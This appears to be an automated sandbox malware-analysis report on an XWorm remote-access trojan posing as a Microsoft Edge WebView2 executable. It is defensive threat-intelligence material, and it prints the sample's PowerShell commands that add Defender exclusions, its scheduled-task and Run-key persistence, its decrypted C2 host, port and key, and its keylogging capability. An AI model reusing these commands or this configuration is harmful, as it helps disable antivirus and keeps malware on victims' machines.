
Windows Analysis Report
MicrosoftEdgeWebview2.exe

Overview

General Information

Sample name: MicrosoftEdgeWebview2.exe
Analysis ID: 1501598
MD5: 51a89f27afe7c3b57d5cdad473178934
SHA1: f945eba7f25f15d231f962143b8f0381270709fb
SHA256: e36aa73b955f2e30b2377dd33c6b55c798f7334ace728b0ad19187965cbe8196
Tags: exe, xworm

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • MicrosoftEdgeWebview2.exe (PID: 7632 cmdline: "C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe" MD5: 51A89F27AFE7C3B57D5CDAD473178934)
    • powershell.exe (PID: 7716 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7964 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftEdgeWebview2.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7324 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7300 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftEdgeWebview2.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7764 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeWebview2" /tr "C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • MicrosoftEdgeWebview2.exe (PID: 5408 cmdline: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe MD5: 51A89F27AFE7C3B57D5CDAD473178934)
  • MicrosoftEdgeWebview2.exe (PID: 5324 cmdline: "C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe" MD5: 51A89F27AFE7C3B57D5CDAD473178934)
  • MicrosoftEdgeWebview2.exe (PID: 2004 cmdline: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe MD5: 51A89F27AFE7C3B57D5CDAD473178934)
  • MicrosoftEdgeWebview2.exe (PID: 8068 cmdline: "C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe" MD5: 51A89F27AFE7C3B57D5CDAD473178934)
  • MicrosoftEdgeWebview2.exe (PID: 5800 cmdline: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe MD5: 51A89F27AFE7C3B57D5CDAD473178934)
  • cleanup

Note: the Desktop original (PID 7632) does all of the installation work. It copies itself to %Temp%, adds Defender exclusions for both file paths and for its own process name, writes a Run key, drops a Startup .lnk and registers a task that runs the %Temp% copy every minute at the highest run level. The five later launches of the %Temp% copy (PIDs 5408, 5324, 2004, 8068, 5800) are consistent with that minute-interval task firing during the analysis run.

Malware Configuration

{"C2 url": ["on-weighted.gl.at.ply.gg"], "Port": "15883", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Yara Overview

Initial Sample
Source | Rule | Description | Author | Strings
MicrosoftEdgeWebview2.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
MicrosoftEdgeWebview2.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x87f4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8891:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x89a6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x846c:$cnc4: POST / HTTP/1.1

Dropped Files
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • the dropped file is a byte-identical copy of the sample (same MD5), so the same four strings match at the same offsets: 0x87f4 ($cnc1), 0x8891 ($cnc2), 0x89a6 ($cnc3), 0x846c ($cnc4)

Memory Dumps
Source | Rule | Description | Author | Strings
00000000.00000000.1661069038.00000000008E2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000000.00000000.1661069038.00000000008E2000.00000002.00000001.01000000.00000003.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x85f4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8691:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x87a6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x826c:$cnc4: POST / HTTP/1.1
  (offsets here are relative to the dumped section, hence 0x200 lower than the file offsets)
Process Memory Space: MicrosoftEdgeWebview2.exe PID: 7632 | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |

Unpacked PEs
Source | Rule | Description | Author | Strings
0.0.MicrosoftEdgeWebview2.exe.8e0000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
0.0.MicrosoftEdgeWebview2.exe.8e0000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • same four strings as the initial sample, at the same offsets (0x87f4, 0x8891, 0x89a6, 0x846c)

Note on the AsyncRAT match: MALWARE_Win_AsyncRAT fires only on three generic browser User-Agent strings and the prefix "POST / HTTP/1.1", strings that XWorm shares with the AsyncRAT code base. It does not indicate a second payload. The decrypted configuration, the JoeSecurity_XWorm rule and the ETPRO "XWorm V3 CnC" Suricata alert all identify the family as XWorm.

Sigma Overview

System Summary

Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe, ProcessId: 7632, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeWebview2
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe", ParentImage: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe, ParentProcessId: 7632, ParentProcessName: MicrosoftEdgeWebview2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe', ProcessId: 7716, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe", ParentImage: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe, ParentProcessId: 7632, ParentProcessName: MicrosoftEdgeWebview2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe', ProcessId: 7324, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe", ParentImage: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe, ParentProcessId: 7632, ParentProcessName: MicrosoftEdgeWebview2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe', ProcessId: 7324, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe", ParentImage: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe, ParentProcessId: 7632, ParentProcessName: MicrosoftEdgeWebview2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe', ProcessId: 7716, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe, ProcessId: 7632, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeWebview2
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe", ParentImage: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe, ParentProcessId: 7632, ParentProcessName: MicrosoftEdgeWebview2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe', ProcessId: 7716, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe, ProcessId: 7632, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicrosoftEdgeWebview2.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeWebview2" /tr "C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeWebview2" /tr "C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe", ParentImage: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe, ParentProcessId: 7632, ParentProcessName: MicrosoftEdgeWebview2.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeWebview2" /tr "C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe", ProcessId: 7764, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe", ParentImage: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe, ParentProcessId: 7632, ParentProcessName: MicrosoftEdgeWebview2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe', ProcessId: 7716, ProcessName: powershell.exe
Suricata IDS Alerts

Timestamp: 2024-08-30T07:19:29.560654+0200
SID: 2855924
Severity: 1
Source Port: 49738
Destination Port: 15883
Protocol: TCP
Classtype: Malware Command and Control Activity Detected


AV Detection

Source: MicrosoftEdgeWebview2.exe | Avira: detected
Source: on-weighted.gl.at.ply.gg | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: MicrosoftEdgeWebview2.exe | Malware Configuration Extractor: Xworm {"C2 url": ["on-weighted.gl.at.ply.gg"], "Port": "15883", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: on-weighted.gl.at.ply.gg | Virustotal: Detection: 6%
Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | Virustotal: Detection: 69%
Source: MicrosoftEdgeWebview2.exe | Virustotal: Detection: 69%
Source: MicrosoftEdgeWebview2.exe | ReversingLabs: Detection: 81%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | Joe Sandbox ML: detected
Source: MicrosoftEdgeWebview2.exe | Joe Sandbox ML: detected
Source: MicrosoftEdgeWebview2.exe | String decryptor: on-weighted.gl.at.ply.gg
Source: MicrosoftEdgeWebview2.exe | String decryptor: 15883
Source: MicrosoftEdgeWebview2.exe | String decryptor: <123456789>
Source: MicrosoftEdgeWebview2.exe | String decryptor: <Xwormmm>
Source: MicrosoftEdgeWebview2.exe | String decryptor: (empty string)
Source: MicrosoftEdgeWebview2.exe | String decryptor: USB.exe
Source: MicrosoftEdgeWebview2.exe | String decryptor: %Temp%
Source: MicrosoftEdgeWebview2.exe | String decryptor: MicrosoftEdgeWebview2.exe
Source: MicrosoftEdgeWebview2.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: MicrosoftEdgeWebview2.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Note: the low URL-reputation coverage (6%) for the C2 hostname is not a reason to downgrade. The hostname comes straight from the decrypted configuration, and the live session to it raised the ETPRO XWorm CnC signature in the Networking section below. The decrypted strings also give the install location (%Temp%) and file name (MicrosoftEdgeWebview2.exe) that the process tree confirms.

Networking

Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49738 -> 147.185.221.20:15883
Source: Malware configuration extractor | URLs: on-weighted.gl.at.ply.gg
Source: global traffic | TCP traffic: 192.168.2.4:49737 -> 147.185.221.20:15883
Source: Joe Sandbox View | IP Address: 147.185.221.20
Source: Joe Sandbox View | ASN Name: SALSGIVERUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: on-weighted.gl.at.ply.gg
Source: powershell.exe, 00000007.00000002.1991423534.000001C3E164F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000007.00000002.1991423534.000001C3E164F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000001.00000002.1756728657.0000019BA0790000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microse
Source: powershell.exe, 00000001.00000002.1750884360.0000019B982E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1842304837.000001594D055000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1968790831.000001C3D8F65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2147441843.0000016A10074000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.2026431273.0000016A00229000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1728941013.0000019B88498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786821910.000001593D208000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1882617486.000001C3C9119000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2026431273.0000016A00229000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: MicrosoftEdgeWebview2.exe, 00000000.00000002.2925865924.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1728941013.0000019B88271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786821910.000001593CFE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1882617486.000001C3C8EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2026431273.0000016A00001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1728941013.0000019B88498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786821910.000001593D208000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1882617486.000001C3C9119000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2026431273.0000016A00229000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.2026431273.0000016A00229000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1756847376.0000019BA089E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000001.00000002.1728941013.0000019B88271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786821910.000001593CFE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1882617486.000001C3C8EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2026431273.0000016A00001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000B.00000002.2147441843.0000016A10074000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2147441843.0000016A10074000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2147441843.0000016A10074000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.2026431273.0000016A00229000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1750884360.0000019B982E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1842304837.000001594D055000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1968790831.000001C3D8F65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2147441843.0000016A10074000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

Note: the URLs recovered from powershell.exe memory (nuget.org, pesterbdd.com, contoso.com, schemas.xmlsoap.org, the apache.org licence, aka.ms) are strings from PowerShell's own modules and help text, not destinations the sample contacted. The only real external traffic in this run is the DNS lookup of on-weighted.gl.at.ply.gg and the TCP sessions from ports 49737 and 49738 to 147.185.221.20:15883, one of which carried the XWorm V3 PING that the Suricata rule matched.

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: MicrosoftEdgeWebview2.exe, XLogger.cs | .Net Code: KeyboardLayout
Source: MicrosoftEdgeWebview2.exe.0.dr, XLogger.cs | .Net Code: KeyboardLayout

Operating System Destruction

Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe | Process information set: 01 00 00 00 (ProcessBreakOnTermination = 1: the process marks itself critical, so terminating it triggers a bugcheck instead of a clean exit; this is the "Protects its processes via BreakOnTermination flag" signature, and setting it is why the sample also enables SeDebugPrivilege)

System Summary

Source: MicrosoftEdgeWebview2.exe, type: SAMPLE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.MicrosoftEdgeWebview2.exe.8e0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.1661069038.00000000008E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe | Code function: 0_2_00007FFD9B6D12B9
Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe | Code function: 0_2_00007FFD9B6D9E82
Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe | Code function: 0_2_00007FFD9B6D0EF0
Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe | Code function: 0_2_00007FFD9B6D90D6
Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe | Code function: 0_2_00007FFD9B6D1C4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFD9B7830E9
Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | Code function: 15_2_00007FFD9B6D12B9
Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | Code function: 15_2_00007FFD9B6D1C4D
Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | Code function: 16_2_00007FFD9B6B12B9
Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | Code function: 16_2_00007FFD9B6B1C4D
Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | Code function: 17_2_00007FFD9B6B12B9
Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | Code function: 17_2_00007FFD9B6B1C4D
